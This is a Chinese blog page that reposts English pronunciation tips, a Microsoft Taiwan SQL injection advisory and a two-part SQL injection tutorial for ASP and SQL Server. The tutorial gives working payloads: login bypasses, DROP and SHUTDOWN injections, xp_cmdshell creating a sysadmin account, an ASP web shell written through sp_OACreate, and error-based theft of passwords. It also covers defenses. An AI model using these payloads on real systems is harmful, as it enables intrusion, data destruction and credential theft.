PIXNET Logo登入

雪 薄草的部落格

跳到主文

歡迎光臨雪 薄草在痞客邦的小天地

部落格全站分類:不設分類

  • 相簿
  • 部落格
  • 留言
  • 名片
  • 7月 12 週一 201023:42
  • 10 tips for perfect pronunciation/10種完美發英的秘訣 (中英對照 精華文章)

每個人都知道使用英語是唯一改善你的英文發音的方式。但是如果你無法每天和以英語為母語的外國人練習怎麼辦?不用擔心!有很多方法都可以延伸你的聲帶。
1.Listen to yourself.

如果你不能聽出你自己的發音問題,那很難去改正它。試著把你的演說用錄音帶錄下來,並與以英語為母語的外國人士做個比較。


2. Slow down!

很多英文學習者說話的時候,都說的很快然而增加他們的壞習慣。每一天練習一點點。先從單升調開始,然後轉換成單字,最後,將這些單字合起來。


3. Picture it... 

閉上你的眼睛,在說之前想想如何發這個音。想像你的嘴巴和臉的定位。


4. Get physical!

發音是一個肢體技巧。你正教你的嘴巴一個新的方法去移動和使用不同的肌肉。每一天專注在困難的音調。有沒有困難發'th'?把你的舌頭放在你的牙齒之間(不要咬緊)然後,從嘴巴裡吐氣出來。感覺空氣在你的舌頭上面移動。


5. Watch yourself. 

站在鏡子前面看看你舌頭,嘴唇和嘴型的位置當你發音的時候。和你所看的Englishtown發音錄影帶做比較!


6.Copy the experts.

沒有任何可取帶讓以英語為母語的人士來教你發音。所以注意聽!聽聽英語廣播節目,看英語電視和電影。(不要看字幕!)模仿你聽到的聲音-即使你不確定他們說什麼。


7. Practice alone.

發音問題會一直持續因為我們會害怕出錯。編一個劇本-第一次和別人見面,餐廳點餐,詢問方向-然後自己演出一段對話。不要害羞!


8. Find a language buddy. 

從旁人那得到回饋是很重要的。找一個朋友他也對改善英文很有興趣。試著去交換過去的留言你可以更接近的聽出每一個人的發音。


9. Be poetic.

好的發音更勝於專精於每一個音。這很容易瞭解intonation(聲音的升降)和stress (一些音在字當中和一些自在句子當中比其他更大聲或是更清楚)。大聲地唸詩,演講和唱歌,專注在字的重音和音調。


10. Sing a song! 

聽單字從熱門英文歌曲中並跟著唱。唱歌可以放鬆心情和使用這些單字,也可以幫助你的節奏和語調。




Everyone knows that using English is the only way to really improve your pronunciation. But what if you can't practice with a native speaker every day? Don't worry! There are plenty of ways to stretch your vocal chords.
1. Listen to yourself. If you can't hear your pronunciation problems, it's tough to correct them. Try recording your speech on a tape and comparing it with a native speaker's.
2. Slow down! Many English learners say that speaking too quickly reinforces their bad habits. Practice a few basics each day. Start with single sounds, then move on to words, and finally, string several words together.3. Picture it... Close your eyes and think about how to make a sound before saying it. Visualize the positioning of your mouth and face.4. Get physical! Pronunciation is a physical skill. You're teaching your mouth a new way to move and using different muscles. Focus on difficult sounds each day. Having trouble with 'th'? Put your tongue between your teeth (don't bite down) and blow air out of your mouth. Feel the air move over the top of your tongue.5. Watch yourself. Stand in front of a mirror to see the placement of your tongue, lips, and shape of your mouth when you make certain sounds. Compare what you see with an Englishtown pronunciation video!6. Copy the experts. There's no replacement for learning pronunciation from the experts ?native speakers. So listen! Listen to English radio programs and watch television and movies in English. (Don't read the subtitles!) Imitate what you're hearing ?even if you're not sure what they're saying yet.7. Practice alone. Pronunciation problems persist because we're afraid to make mistakes. Create scenarios - meeting someone for the first time, ordering at a restaurant, asking for directions ?then act out the dialogue by yourself. Don't be shy!8. Find a language buddy. Getting feedback from an outside observer is crucial. Find a friend who's also interested in improving their English. Try exchanging recorded messages so you can listen closely to each other's pronunciation.9. Be poetic. Good pronunciation is more than just mastering individual sounds. It's also understanding intonation (the rise and fall of the voice) and stress (some sounds in words and some words in sentences are louder or clearer than others). Read poems, speeches and songs aloud, concentrating on the word stress and intonation.10. Sing a song! Learn the words to popular English songs and sing along. Singing helps you relax and just get those words out, as well as helping your rhythm and intonation.
(繼續閱讀...)
文章標籤

雪 薄草 發表在 痞客邦 留言(0) 人氣(128)

  • 個人分類:笨蛋的英文筆記
▲top
  • 6月 09 週三 201013:44
  • 『資料隱碼』SQL Injection的源由與防範之道

近日來報章報導有關網路駭客使用『資料隱碼』(SQL
Injection)來竊取資料或破壞電子商務網站,對於網路駭客所造成的負面影響,應予以嚴厲譴責。
    
資料庫為電子商務與企業內各應用系統資料儲存之軟體系統,而對資料庫進行存取或查詢主要是使用資料查詢語言-SQL
(Structure
Query Language,
SQL),幾乎所有的資料庫廠商都使用SQL為其標準的資料查詢語言。因此絕大部份電子商務的交易行為都會使用SQL語言所撰寫程式碼來存取或查詢資料庫
內所存放之資料。

    
對於典型的電子商務網站而言,一般的會員認證與資料查詢作業,是當客戶輸入資料或查詢條件後,經過程式存取後端資料庫並將結果呈現在網頁上,若未能對客戶
所輸入的資料進行驗証,就讓駭客有機可乘。大部份的駭客係利用輸入特殊命令,讓系統將之與標準的資料庫查詢程式和資料合併在一起,送給資料庫管理系統執
行,因此一段有害的程式碼被正常的程式碼包裝起來形成『隱碼』,直接對資料庫存取資料或進行破壞,進而造成資料庫損毀或資料流失。因此任何與客戶互動的程
式尤其是會對資料庫進行存取或查詢的程式碼,都是駭客下手的對象。

    
由於此種方式並非透過病毒及一般攻擊手段,而是經由標準且既定的程序操作,只是輸入具破壞性的程式碼,對現階段任何防火牆或是防駭客系統而言,是無法防範
的。至於資料庫管理系統,依SQL程式來進行查詢等動作,而『隱碼』有可能是錯誤的輸入或SQL程式,因此較難從資料庫管理系統上來防範,唯有加強安全控
管與降低程式存取資料庫的權限,最佳方式是從程式設計來著手,唯有建立起良好的程式開發風格與習慣,方能阻檔此類的攻擊事件。

幾種可能的『資料隱碼』攻擊模式如下:

利用特殊指令攻擊


駭客於任何要求輸入資料時打入特殊指令或程式碼,讓破壞性程式碼『隱藏』在標準的SQL程式中,達到其攻擊目的。


利用系統的錯誤訊息找出資料庫弱點



要對資料庫進行存取或修改,必需要對資料庫的結構有所瞭解,通常駭客很難瞭解資料庫結構,但未經掩飾的錯誤訊息反而容易造成問題。資料庫管理系統為能協助
程式開發與管理人員了解錯誤指令所造成的問題與根源,會在錯誤訊息上顯示完整的資訊,若電子商務系統未經防範而直接讓錯誤訊息顯示在網頁上,無異是給駭客
入侵留下線索。


為能有效的阻絕駭客利用『資料隱碼』方式入侵,微軟建議採取以下各項防範之道:



1.
加強程式上的安全檢查措施:在程式中加上輸入資料型態檢查、資料長度檢查與資料內容檢查,讓駭客無法利用隱藏於輸入資料的特殊指令或程式碼有機可乘。


2. 妥善使用權限管理:在程式中勿用較高權限來存取資料庫,比如說讓SQL程式使用資料庫管理員(System
Administrator,
SA)身份來存取資料庫。此外,若使用Windows 2000作業系統搭配SQL Server則建議使用Windows
2000認證機制。


3.
保持良好的程式開發習慣:撰寫資料庫存取或查詢程式時,利用兩個單引號『’’』來標註任何輸入的變數給SQL程式;利用單引號『’』會讓駭客的隱碼易於得
逞。


4.
將核心程式碼隱藏起來:勿讓網頁上程式直接存取或查詢資料庫,而是透過預存程式(Stored-procedure)來執行,而XML Web
Service也是另一個提高安全性的好方法,保護核心程式邏輯與資料庫結構不至外洩,而Microsoft SQL Server
2000是目前唯一支援XML Web Service的資料庫管理系統。


5.
以標準的訊息回覆給客戶:電子商務網站對於任何回覆給客戶的訊息應有所規範,透過程式攔截下任何作業系統或資料庫管理系統所可能產生的錯誤訊息,改以統一
且明確的訊息來指導客戶。


6.
刪除多餘的資料表(Table):資料庫管理系統安裝後會有幾個既存的資料表,這些資料表是供程式開發、範例資料庫或暫存使用,如”pub”
及”Northwind”等,請在電子商務網站上線後移除;因為這些公用的資料表架構是公開的,易為駭客所利用。


轉自 : http://www.microsoft.com/taiwan/SQL/SQL_Injection.htm
(繼續閱讀...)
文章標籤

雪 薄草 發表在 痞客邦 留言(0) 人氣(453)

  • 個人分類:Web安全
▲top
  • 6月 09 週三 201012:59
  • SQL Injection – 駭客的 SQL填空遊戲(下)

作者:恆逸資訊 胡百敬
審稿:恆逸資訊 張智凱

前言

在上一期中,我們介紹了透過組合 SQL
語法;以較為簡單的方式侵入網站系統,本期再進一步介紹透過 SQL
Server
本身強大的功能,可能完成進一步侵入的動作。

SQL Injection – 駭客的
SQL填空遊戲


SQL Server
本身提供了非常多的函數、預存程序、延伸預存程序來輔助
T-SQL,好讓程式設計師透過 T-SQL
完成商業邏輯運作所需的預存程序。但一般的使用者較熟悉以 Visual
Basic
等程式語言來撰寫存取資料的程式,因而對此類的功能所知不多,更別提要如何防範駭客透過這一類的功能來遂行其目的。


使用具破壞力的語法


以下列舉部分的功能稍做討論。
停掉 SQL Server 的執行


直接輸入

Shutdown 命令,要求 SQL
Server
停止執行。在網頁上輸入帳號的地方可以直接鍵入以下語法便可:




' ;SHUTDOWN--




破壞內容
當然,只要權限夠,也可以執行有破壞性的 SQL 語法
1
。如刪除某個資料庫:




' ;DROP Database <資料庫名稱>--





刪除資料庫內某個資料表:




' ;DROP Table <資料表名稱>--





清空某個資料表:




' ;Truncate Table <資料表名稱>--





抑或是以 DELETE 清空資料表:




' ;DELETE FROM <資料表名稱>--





使用進階且功能強悍的延伸預存程序


這一類的預存程序多以 xp_ 開頭,存放在 master
系統資料庫的延伸預存程序中。有趣的是大部分的延伸預存程序在 SQL
Server
所附的線上說明中都沒有列出來,也沒有說明。筆者本想到微軟網站利用全文檢索找尋這些延伸預存程序的蛛絲馬跡,以列表討論,但發現大多是無可奉告
(undocumented),看來延伸預存程序雖然功能強大,但微軟並不鼓勵大家使用。
筆者選幾個較有趣的分別介紹。


執行其他應用程式


xp_cmdshell
應該是大家最常使用的延伸預存程序之一,透過這個延伸預存程序可以
SQL Server 的系統帳號來執行任何應用程式。


以下程式碼列表 1 直接利用作業系統所附的 NET
工具程式,在
Windows 系統中加入一個使用者帳號 Hacker
;沒有密碼,並將該帳號加到
SQL Server,再放入到最大的使用者權力群組 sysadmin:




' ; EXEC MASTER..XP_CMDSHELL 'net
user
Hacker /add' EXEC
MASTER..SP_GRANTLOGIN
'BYRON-XP\Hacker' EXEC
MASTER..SP_ADDSRVROLEMEMBER
'BYRON-XP\Hacker','sysadmin'--




程式碼列表 1:加入自訂的使用者,並賦予該帳號最大的權限。

若你還開放網際網路存取 SQL Server預設使用的 TCP 1433
埠,則駭客將有機會唐而皇之地控管 SQL Server。


與 Registry 相關的系統預存程序


SQL Server 提供了大量與 Registry
相關的延伸預存程序,以
xp_reg 開頭作為代表2。
內容有:


xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite


駭客可以利用此類的延伸預存程序存取系統的註冊資料,例如查詢該機器上有哪些共享目錄,範例如程式碼列表
2
。再利用上一期的技巧,以錯誤訊息來呈現結果。




CREATE TABLE tblShareDir(DirName
VARCHAR(100), DirAtt VARCHAR(100))
INSERT tblShareDir EXEC
MASTER..XP_REGENUMVALUES
HKEY_LOCAL_MACHINE,'system\CurrentControlSet\Services\lanmanserver\shares'




程式碼列表 2:利用 XP_RegEnumValues
取得系統的共享目錄。


再利用上篇文章介紹的以錯誤訊息來呈現結果的技巧,或是以下文中透過
bcp.exe
工具程式將 tblShareDir 輸出成檔案,都可以取得想要的結果。


與 OLE Automation/COM 物件相關的延伸預存程序


SQL Server 提供了一組存取伺服器外部 OLE
物件相關的預存程序。它們分別是:


sp_OACreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop



你可以用它們來建立 OLE 物件(一般COM 物件就可以了,但要支援
IDispatch
介面),執行物件的方法,讀取與修改屬性,進行錯誤處理。但它們無法回應一般
OLE 或
COM 物件的事件。


有了 COM/OLE
物件的建立與執行,對於控制系統來說可算是如虎添翼,無所不能了。稍舉個例子,駭客可以利用它來取得有興趣的網頁的原始碼,如程式碼列表
3
:




';DECLARE @shell INT EXEC
SP_OACREATE 'wscript.shell',@shell
OUTPUT EXEC SP_OAMETHOD
@shell,'run',null,
'C:\WINNT\system32\cmd.exe /c type
c:\inetpub\wwwroot\sqlinject\login.asp
>
c:\inetpub\wwwroot\sqlinject\test.txt'--




程式碼列表 3:取得 login.asp 網頁的內容。

在程式碼列表 3 中,利用 SP_OACREATE 建立
“wscript.shell” 物件,並利用 SP_OAMETHOD
呼叫
“wscript.shell” 物件的 run
方法,以執行作業系統命令介面工具程式
cmd.exe,將 login.asp 輸出到 test.txt
檔案中,這時駭客只要在網頁上輸入
http://.../.../test.txt
就可以看到 login.asp 寫作的方式,作為下一步侵入的基本資訊。


當然,駭客也可以利用
Scripting.FileSystemObject
物件來建立一個 ASP 網頁後門,語法如程式碼列表 4
所示:




DECLARE @fs int,@fi int
EXEC SP_OACREATE
'Scripting.FileSystemObject',@fs
OUTPUT
EXEC SP_OAMETHOD
@fs,'CreateTextFile',@fs
OUTPUT,'C:\InetPub\WWWRoot\SQLInject\Shell.asp',1
EXEC SP_OAMETHOD
@fs,'WriteLine',null,'<%
Set
objShell=Server.CreateObject("WScript.Shell")
: objShell.Run Request("cmd") %>'




程式碼列表 4:建立 ASP 後門網頁。

從此透過 URL 就可以執行任何執行檔,範例如下:




http://localhost/sqlinject/shell.asp?cmd=C:\WINNT\system32\cmd.exe
/c type
c:\inetpub\wwwroot\sqlinject\login.asp
>
c:\inetpub\wwwroot\sqlinject\test.txt





其他相關的延伸預存程序


這一類的延伸預存程序,你可能要小心的還有:



延伸預存程序的名稱


用途


使用範例




xp_availablemedia


顯示系統上可用的磁碟機,如
C:\。


xp_availablemedia




xp_dirtree


顯示某個目錄下的子目錄與檔案架構。


xp_dirtree
'c:\inetpub\wwwroot\'




xp_enumdsn


列出系統上已經設定好的
ODBC
資料來源名稱(DSN
Data
Source
Name)。


xp_enumdsn




xp_enumgroups


列出作業系統上的使用者群組及該群組的說明。


xp_enumgroups




xp_getfiledetails


獲取某個檔案的相關屬性。


xp_getfiledetails
'C:\Inetpub\wwwroot\SQLInject\login.asp'




dbo.xp_makecab


將目標多個檔案壓縮到某個目標檔案之內。
所有要壓縮的檔案都可以接在參數列的最後方,以逗號隔開。


dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
…




xp_ntsec_enumdomains


列出伺服器的網域名稱。


xp_ntsec_enumdomains




xp_servicecontrol


停掉或啟動某個服務。


xp_servicecontrol
'stop','schedule'
xp_servicecontrol
'start','schedule'




dbo.xp_subdirs


只列某個目錄下的子目錄。


dbo.xp_subdirs
'c:\'




xp_terminate_process


停掉某個執行中的程序,但賦予的參數是
Process ID。
利用”工作管理員”,透過選單「檢視」-「選擇欄位」勾選
pid,就可以看到每個執行程序的
Process ID


xp_terminate_process
2484




xp_unpackcab


解開壓縮檔。


xp_unpackcab
'c:\test.cab','c:\temp',1




以上表列的延伸預存程序是筆者在 master
系統資料庫中,尋找名稱比較有趣的;經過一一測試的結果。但不代表可以用來侵入系統的延伸預存程序都已經完全列出,畢竟駭客的創意屢屢翻新,你必須要時時
謹慎小心。


SQL Server 的工具程式


透過 SQL Server
所提供的一些工具程式可以直接將資料表的內容輸出成檔案,例如透過 bcp 的
out
參數,將儲存會員資料的資料表整個輸出成檔案,範例如下:




bcp northwind.dbo.tblUser out
C:\inetput\wwwroot\sqlinject\user.txt
-c -Usa -P -SByron-XP





當然,isql.exe 和 osql.exe
也都可以辦到同樣的功能,例如:




osql -Usa -P -SByron-XP -dNorthwind
-oc:\inetpub\wwwroot\sqlinject\users.txt
-Q"select * from tblUser"





這一類的工具程式可以搭配前文的 xp_cmdshell
延伸預存程序,或是交由利用
sp_OA 系列預存程序建立的木馬 ASP
來執行,都可以達到竊取資料的目的。


對於預防 SQL Injection 的建議


綜合以上各種的侵入技巧,筆者在此歸納一些維護系統安全的建議。

  • 儘量
    地利用 ASP
    或
    ASP.NET
    在伺服器端檢查與限制輸入變數的型別與長度,過濾掉不需要的內容。要注意的是這些檢查不要放在前端。
    就算在前端利用 HTML
    Input
    標籤的
    MaxLength
    屬性,或是以
    JScript
    撰寫程式來設定欄位長度的限制,只要將該網頁另存新檔,修改內容後(一般只要改寫
    Form 的
    Action
    屬性以及
    Input 的
    MaxLength
    屬性),重新以瀏覽器開啟再執行便可避過這些瀏覽器端的檢查。
  •  ASP
    程式登入
    SQL
    Server
    的帳號不要使用
    sa,或任何屬於
    Sysadmin
    群組的帳號,避免有過大的權限。
  • sa
    一定要有強固的密碼,尤其是
    SQL
    Server 7.0
    以前的版本,在裝機時預設
    sa
    沒有密碼,而一般管理者裝完後也忘了或怕麻煩而不更改密碼。
  • 利用
    ADO 的
    Command 物件或
    ADO.NET 的
    SqlCommand
    class
    來透過參數執行
    SQL
    語法,直接以
    ADODB 的
    Connection
    物件執行預存程序的寫法一樣糟糕。範例如下:




  • Exec spXXX 參數,…





    因為駭客所加入的 SQL 語法一樣可以執行:




    Exec spXXX 參數,…;SHUTDOWN





    我們可以建立一個預存程序程式碼列表 5:




    ECREATE PROC spUserAccount
    @UserName NVarchar(50),@Password
    NVarchar(50)
    AS
    SELECT UserName,Password FROM
    tblUser
    WHERE UserName=@UserName AND
    Password=@Password




    程式碼列表 5:用來找尋符合的使用者帳號密碼的預存程序。

    同時將整個 ASP 的查詢換成如程式碼列表 6 的寫法:




    <%
    If Request("UserName")<>"" And
    Request("Pass")<>""
    Then
    Dim cnn,rec,strSQL,cmd
    Set
    cnn=Server.CreateObject("ADODB.Connection")
    With cnn
    .ConnectionString=Application("Conn")
    .Open
    End With
    '透過 ADODB.Command 物件來搭配預存程序,駭客就無法
    '利用組合 SQL 字串的方式來侵入系統
    Set
    cmd=Server.CreateObject("ADODB.Command")
    With cmd
    .ActiveConnection = cnn
    .CommandText = "spUserAccount"
    .CommandType = 4 'adCmdStoredProc
    .Parameters.Append
    .CreateParameter("UserName",
    202, 1, 50, Request("UserName"))
    '202 代表 adVarWChar,1 代表 adParamInput
    .Parameters.Append
    .CreateParameter("Password",
    202, 1, 50, Request("Pass"))
    Set rec = .Execute()
    End With
    If NOT rec.EOF Then
    Session("UserName")=Request("UserName")
    Response.Write "歡迎光臨 " &
    Request("UserName")
    Else
    Response.Write "您的帳號/密碼輸入錯誤"
    End If
    Else
    %>




    程式碼列表 6:利用 ADODB 的 Command
    物件來存取預存程序。


    如程式碼列表 6 中灰色的程式碼區塊,將存取 SQL Server
    預存程序的方式改以透過 ADODB 的 Command
    物件,如此駭客就不能用加入自訂
    SQL 的語法來要求 SQL Server 執行額外的動作。

  • 改掉
    預設的 Web
    虛擬路徑,不要使用 IIS
    裝好後預設的
    <系統所在磁碟>\Inetpub\WWWRoot
    路徑,否則利用前述的檔案存取方式,很容易在該目錄下動手腳。

  • 不要顯示錯誤訊息到前端。
    利用
    VBScript
    語法的 On
    Error
    Resume
    Next,並搭配 If
    Err.Number<>0
    Then
    的錯誤處理方式,自行將錯誤重導到適當的錯誤處理網頁,如此系統將更穩固,且駭客也不易透過錯誤訊息來探知系統的內部運作方式。
    或著,也可以修改<系統所在磁碟>\WINNT\Help\iisHelp\common\500-100.asp
    預設網頁,最簡單的方式就是將它更改名字3。
  •  將
    用不到但功能強大的延伸預存程序刪除。
  •  監
    控系統的執行。
  •  防
    火牆關閉
    TCP
    1433/UDP
    1434
    埠(port)對外的連線4
    。
  •  隨
    時注意是否有新的修補程式要上。


  • 以上是針對 SQL Injection
    防護方式的建議,但我們應該謹記於心的是世界上沒有絕對安全的系統,只有自己時時小心,多看多聽駭客們是否有翻新的手法,系統是否有異常的狀況,唯有不斷
    加強系統的安全措施,才能將危害降至最低。


    相關網址


    以下是一些關於 SQL 以及系統安全的網址,提供給大家參考。
    http://www.microsoft.com/sql/



    http://www.microsoft.com/security/



    http://www.sqlsecurity.com/



    http://www.nextgenss.com/



    http://www.atstake.com/



    http://www.securityfocus.com/



    http://www.appsecinc.com/

    轉自 : http://www.microsoft.com/Taiwan/sql/SQL_Injection_G2.htm

    註釋:




    1


    就筆者的觀察,一般的程式設計師多喜歡用
    SQL
    Server
    最大的預設帳號 sa
    來存取資料。因此給予駭客予取予求的權力。






    2


    這裡表列的延伸預存程序可以透過
    Enterprise
    Manager 或
    Query
    Analyzer
    看到,但是在 SQL
    Server
    線上叢書找不到相關資料。






    3


    筆者不建議一開始就刪除500-100.asp,因為這會導致很難替程式除錯。建議在程式開發完成上線後,將
    500-100.asp
    更改名稱。在自行撰寫的
    asp
    檔首加入 On
    Error Resume
    Next/If
    Err.Number
    <> 0 Then
    等,錯誤處理應該是在程式撰寫時就要注意的程式架構,若為了除錯方便,可以先以單引號讓
    On
    Error
    Resume Next
    語法成為說明。






    4


    有報告顯示現今有網路蜘蛛專門尋找在網際網路上,可以直接透過
    TCP
    1433/UDP
    1434
    埠(port)存取,但
    sa
    帳號沒有設定密碼的
    SQL
    Server,在找到該伺服器後便利用前述的技巧取得對系統的控制權。
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(196)

    • 個人分類:Web安全
    ▲top
    • 6月 09 週三 201012:56
    • SQL Injection (資料隱碼)– 駭客的 SQL填空遊戲(上)

    作者:恆逸資訊 胡百敬
    審稿:恆逸資訊 張智凱

    前言

    電腦系統的安全一直是你我所重視的,但或許你一直在替系統安裝修正檔,防毒軟體,架設防火牆,劃定非軍事區等等,但可能由於撰寫程式碼的疏忽,你的背後正
    有一個自己營造的大漏洞。

    SQL Injection – 駭客的
    SQL填空遊戲


    在現今的應用程式架構中,大部分都含有資料庫,以容納各式各樣的資料。而在各類型的資料庫中,又以結構化查詢語言(SQL
    Structure Query
    Language)為基礎的關聯式資料庫管理系統(RDBMS
    Relational
    Database Management System)最為流行。

    一般的程式設計師在存取資料庫時,往往是利用 Visual
    Basic等第三代語言來組織 SQL
    語言,然後再傳遞給關聯式資料庫系統執行,以建立或刪除資料結構,賦予或移除使用權限,乃至於新增、修改、刪除或查詢資料。因為關聯式資料庫所有的執行動
    作皆是遵循
    SQL
    命令,所以透過此種方式可以很方便地完成各種資料維護工作。但也正因為 SQL
    語言無所不能,所以稍有漏洞就會讓駭客有機可乘。這兩期文章就針對這個主題做一個深入的探討。


    網站的資料存取一般來說是比較危險的,因為網際網路是一個開放的環境,而不像一般公司內部網路,除了有電腦本身的安全設計,還可以過濾篩檢員工的身分背
    景。網際網路上龍蛇雜處,大部分的使用者都循規導矩,但少數圖謀不軌的人卻處心積慮地要侵入我們的系統,竊取有價值的資料。但一般的網管人員及網頁設計
    師,可能在安全設定上有著重重防範,如架設防火牆,設計非軍事區(DMZ),限制網站登入者的身分等等。但由於缺乏對
    SQL 語言及資料庫管理系統的認知,而大開系統的後門。

    本文針對微軟的 ASP 網站架構搭配 MS SQL Server
    做一個探討及示範,希望能提供各網站的管理人員對 SQL
    Injection
    的入侵方式有個基本的認識,就筆者在撰寫本文時,利用搜尋網站隨意找幾個有會員機制的網站來測試,其中多數都有被此類方式侵入的危險,大家不可不慎。
    筆者在此先建立一個一般會員網站登入網頁的範例,以及相關資料表的架構如下:
    資料表的 Schema 如程式碼列表 1。




    CREATE TABLE
    [tblUser] (
         [UserID] [int] IDENTITY (1, 1) NOT NULL ,
         [UserName] [nvarchar] (50) NOT NULL ,
         [Password] [nvarchar] (50) NOT NULL ,
         [Pri] [tinyint] NULL CONSTRAINT [DF_tblUser_Pri]
    DEFAULT (0),
         CONSTRAINT [PK_tblUser] PRIMARY KEY CLUSTERED
         ([UserID])
    )




    程式碼列表 1:存放會員資料的資料表 Schema。
    並在資料表加入兩筆資料內容



    INSERT
    tblUser(UserName,Password,Pri)
    VALUES('Admin','AdminPass',10)
    INSERT
    tblUser(UserName,Password,Pri)
    VALUES('Byron','ByronPass',10)




    登入網頁的撰寫方式如程式碼列表 2。



    <%
    If
    Request("UserName")<>""
    And
    Request("Pass")<>""
    Then
    Dim
    cnn,rec,strSQL
    Set
    cnn=Server.CreateObject("ADODB.Connection")
    With
    cnn
    .ConnectionString=Application("Conn")
    .Open
    '利用使用者輸入的資料來組合
    SQL
    語法


    strSQL="SELECT
    *
    FROM
    tblUser
    WHERE
    UserName='"
    & _
    Request("UserName")
    & "' AND
    Password='"
    &
    Request("Pass")
    & "'"


    '直接交給 SQL
    Server
    執行,這是最危險的地方

    Set
    rec=.Execute(strSQL)
    End
    With
    If
    NOT
    rec.EOF Then
    Session("UserName")=Request("UserName")
    Response.Write
    "歡迎光臨 " &
    Request("UserName")
    Else
    Response.Write
    "您的帳號/密碼輸入錯誤"
    End
    If
    Else


    %>
    <Form
    action="login.asp">
    使用者名稱:<Input
    Name="UserName"><P>
    密碼:<Input
    Name="Pass"
    >
    <P>
    <Input
    type="submit"
    Value="確定">
    </Form>
    <%
    End
    If
    %>




    程式碼列表 2:簡單的 ASP 登入網頁。
    在程式碼列表 2 中的 ASP 網頁利用
    VBScript
    來組合查詢使用者帳號、密碼的 SQL
    查詢語法,邏輯相當簡單,若資料表中存有符合的帳號、密碼記錄,則回傳的
    Recordset
    的 EOF 屬性是 False,該使用者就算正確登入。
    針對此種網頁,我們以下就開始利用 SQL Injection
    的技巧來”駭”這個網站吧!

    剪接語法
    利用任何已知的使用者名稱登入1:
    例如在網咖偷偷地觀察某個使用者用什麼樣的帳號登入到哪個網站等等,或著先試試一般管理人員可能建立的使用者名稱,如:admin、
    administrator、supervisor、sa
    等等。

    在需要輸入使用者名稱的地方鍵入以下的內容2:
    Admin’--
    而密碼欄位隨便亂輸入,對於會被執行的整句 SQL 沒有什麼關係。示意圖如圖
    1
    。


    圖 1

    :利用已知的會員名稱登入,讓程式碼跳過密碼檢查。
    你可以試著將輸入使用者名稱的內容與程式碼列表 2 的
    SQL
    語法做個整理,將會發現實際傳給 SQL Server 的語法如下




    SELECT *
    FROM
    tblUser
    WHERE
    UserName='admin'--'
    AND
    Password='asdf'




    關鍵就是原先的 AND 子句被 “--" 標示成說明,
    也就是 SQL
    Server 僅僅執行




    SELECT *
    FROM
    tblUser
    WHERE
    UserName='admin'




    自然,若有該使用者存在,則這個 SQL
    查詢語法就傳回該記錄的所有欄位內容。再按照程式碼列表
    2
    的判斷方式:傳回的 Recordset
    是否有記錄,若有就算登入驗證成功。則駭客就可以輕易地以該使用者的身分進入了。
    用未知的使用者名稱登入

    :若沒有已知的帳號,也可以用以下的方
    式輸入到使用者名稱欄位,便能大大方方地侵入:




    ‘ or
    1=1--




    SQL Server 所接收的整個語法變成:



    SELECT *
    FROM
    tblUser
    WHERE
    UserName=''
    or
    1=1--'
    AND
    Password='asdf'




    因為加上的 or 1=1,則不管之前的條件為合,只要
    某個條件為真,整個判斷式就都為真,因此回傳的
    Recordset 物件包含了全部的會員記錄。也導致程式碼列表 2
    中的
    Recordset 物件 EOF 屬性為 False。

    利用錯誤訊息
    獲取欄位數量與名稱

    微軟為了方便 ASP 的程式開發者可以順利地除錯,因此每當 Script
    執行錯誤時,都會透過預設的
    <系統所在磁碟>\WINNT\Help\iisHelp\common\500-100.asp
    網頁將發生錯誤的原因回傳到前端,對於開發者來說,這是一個非常方便的錯誤呈現方式。但駭客也可以利用這個錯誤訊息取得原始
    ASP
    中的查詢語法,並從中了解資料庫中資料表的架構。例如在使用者名稱欄位輸入:
    ' HAVING 1=1--
    則系統會傳回如圖 2 的錯誤訊息。


    圖 2

    :故意製造錯誤,從錯誤訊息中找尋蛛絲馬跡。
    由圖 2 可以知道存放使用者的資料表名稱是
    tblUser,且查詢中有一個欄位叫
    UserID。因此我們再次輸入:
    'GROUP BY UserID HAVING 1=1--
    這回錯誤訊息如圖 3。


    圖 3

    :利用錯誤訊息來了解資料表大致結構。
    再次在圖 3 的錯誤訊息中可知查詢的欄位還有
    UserName,因此繼續以下列方式來查詢3。




    'GROUP BY UserID,UserName HAVING
    1=1--




    利用上述方式取到完整查詢語法後,也就是輸入以下的語法,但不再造成執
    行時期錯誤:




    'GROUP BY
    UserID,UserName,Password,Pri
    HAVING 1=1--




    因為整個傳遞到 SQL Server 的語法變成:



    SELECT * FROM tblUser WHERE
    UserName=''GROUP
    BY UserID,UserName,Password,Pri
    HAVING
    1=1--' AND Password='asdf'




    如此列出所有欄位的 Group By 方式幾近等於沒有 Group
    By,但語法完全正確表示所有的欄位都已經包含在其中了。駭客
    就此可以約略估計資料表的欄位結構。

    在輸入帳號的地方執行以下語法便可以加入自訂的使用者到資料表中。



    ';INSERT INTO tblUser
    Values('hacker','hacker',10)--




    獲取欄位資料型態
    若有資料欄位格式不對,導致無法加入自訂使用者,也可以利用下列語法傳回的錯誤訊息來判讀資料欄位格式:




    'UNION SELECT 'abc',1,1,1 FROM
    tblUser --




    結果傳回如圖 4 的錯誤訊息。


    圖 4

    :利用錯誤訊息來判斷欄位的資料型態。
    在這裡我們透過 UNION 語法來組合兩句 SELECT
    查詢,第一句 SELECT
    語法的第一個欄位 UserID 是 int 格式,但對應的第二句
    SELECT
    語法;第一個欄位的資料是 varchar 格式的 ‘abc’,因此出現如圖
    4
    的錯誤訊息。駭客也由此得知資料表第一個欄位的資料型態是
    int。有耐心地把一個個欄位測試完畢後,便可以得到整個資料表的欄位格式。
    獲取會員的帳號密碼


    利用這個技巧,還可以再進一步獲取使用者的帳號和密碼,例如先以下列語法詢問帳號:




    'UNION SELECT UserName,1,1,1 FROM
    tblUser
    WHERE UserName>'a'--




    IIS 回傳錯誤訊息如圖 5。
    圖 5

    :利用錯誤訊息來取得使用者帳號和密碼。
    因為傳回的記錄”Admin”是 nvarchar 格式,而透過
    union 對應到原先
    int 資料欄位,因此有圖 5
    的錯誤訊息。由以上的錯誤可以得知有一個稱為”Admin”的帳號存在,之後再以下列語法獲得該帳號的密碼。




    'UNION SELECT Password,1,1,1 FROM
    tblUser
    WHERE UserName='admin'--




    錯誤訊息如圖 6。


    圖 6

    :利用錯誤訊息取得帳號 admin 的密碼。
